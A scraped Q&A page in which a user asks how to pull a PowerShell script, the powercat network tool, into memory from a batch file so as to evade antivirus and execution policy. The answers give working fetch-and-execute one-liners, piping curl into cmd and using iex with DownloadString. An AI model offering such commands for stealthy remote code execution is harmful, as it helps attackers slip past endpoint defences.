Logo Questions Linux Laravel Mysql Ubuntu Git Menu
HTML CSS JAVASCRIPT SQL PYTHON PHP BOOTSTRAP JAVA JQUERY R React Kotlin
 

Download remote file into memory via pure batch

Tags:

powershell

batch-file

cmd

In my batch script, I am trying to download and execute a powershell script remotely. Here is the url:

https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1

I want to download the file into memory (without touching disk), for several reasons:

  1. It bypasses AV detection
  2. It bypasses Powershell executionpolicy, so there's no need for the powershell -nop -ep bypass that causes AV detection
  3. Won't throw unneccessary syntax errors
  4. You can directly use functions defined inside the .ps1 script

Obviously i can use certutil:

certutil -urlcache -split -f <url>

but I don't want the file to hit disk, which can cause AV detection.
The same thing can be done with easily using other languages, like PowerShell:

(New-Object Net.WebClient).DownloadString($url)

OR

(New-Object IO.StreamReader([Net.HttpWebRequest]::Create($url).GetResponse().GetResponseStream())).ReadToEnd()

I know batch isn't the best language to do this, but is it possible? (I want pure batch)

like image 752
HaxAddict1337 Avatar asked Feb 19 '20 03:02

HaxAddict1337

People also ask

How do I run a bath file from Ram?

When running a bath file there is no concept of running it from RAM. Windows command processor will always go back to the .bat file for the 'next' command to run. If you edit a batch file while it's running the command processor will pick up your changes.

Is it possible to copy a batch file to ram?

It is not possible to copy a batch file to RAM and inform Windows command interpreter to interpret the command lines in memory. It would be possible to create a RAM disk, copy the batch file to the RAM disk and run it from there. But this just makes the task more complicated than necessary.

Is it possible to cache a whole batch script to ram?

Despite of the other answers, it's trivial to cache a whole batch script to RAM. You only need to build a single block, as blocks are parsed and cached before they can be executed. But blocks have some drawbacks, percent expansion doesn't work, therefore you need to use delayed expansion.

How do I download a file from a remote server?

If the remote server you are using restricts you to a private key/certificate for your remote connections, worry not. You can still achieve remote file download with the following syntax. $ scp -i private_key/certificate_file.pem username@server _url_or_ip:/path/to/download/file/on/server /path/to/download/location/on/desktop

Video Answer

2 Answers

Download and execute without a temporary file

curl -s https://example.com/test.bat | cmd /v:on /k

Example test.bat

@echo off
(
cls

echo Hello
echo Time: !time!
exit
)

Building the code

As said in Force batch file to load to RAM before running you can cache a single command block.

There are some limitations:

  • It's running in cmd (not batch) context, variable expansion is a bit different.
  • Labels can't be used

With this technique you can use the normal batch macro style.

like image 94
jeb Avatar answered Nov 15 '22 06:11

jeb

I know you want pure batch, but seriously though, even with Restricted execution policy of powershell, it permits individual commands. See https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7

So its as simple as

powershell -command iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')
like image 37
loadingnow Avatar answered Nov 15 '22 08:11

loadingnow
Sign in to Comment

Related questions

What version of PowerShell fixed "whatif" propagation?
Powershell is failing bamboo task because -ExecutionPolicy bypass -Command return code is 134 instead of 0
Nesting files in Nuget package without PowerShell
SignTool.exe equivalent in PowerShell
How to install Node.js with Windows PowerShell PackageManager (OneGet)?
Parse YAML file in Powershell
How do I connect a kubernetes cluster to an external SQL Server database using docker desktop?
Rerun failed .NET unit test from PowerShell script or .NET
How to open Github for Windows' Git Shell on right click? [closed]
PowerShell script returns nothing on IIS execution
Boo to the Chocolatey Gods
Windows Firewall state different between Powershell output and GUI
What is the PowerShell equivalent of bash's exec()?
Issuing Temporary Credentials to sign into AWS Management Console using AssumeRole, existing Policies, and unique URL
EscapeDataString having differing behaviour between Powershell IDE and Powershell console
Are there variables for current file or folder in the VS Code terminal?
Color issues with zsh in wsl
Azure PowerShell Connect-AzureAD and Login-AzureRmAccount
MDT Module Updating Media through JEA Endpoint fails adding BCD entry
How to change the Console Ouptut Mode using SetConsoleMode in powershell?

Donate For Us

If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!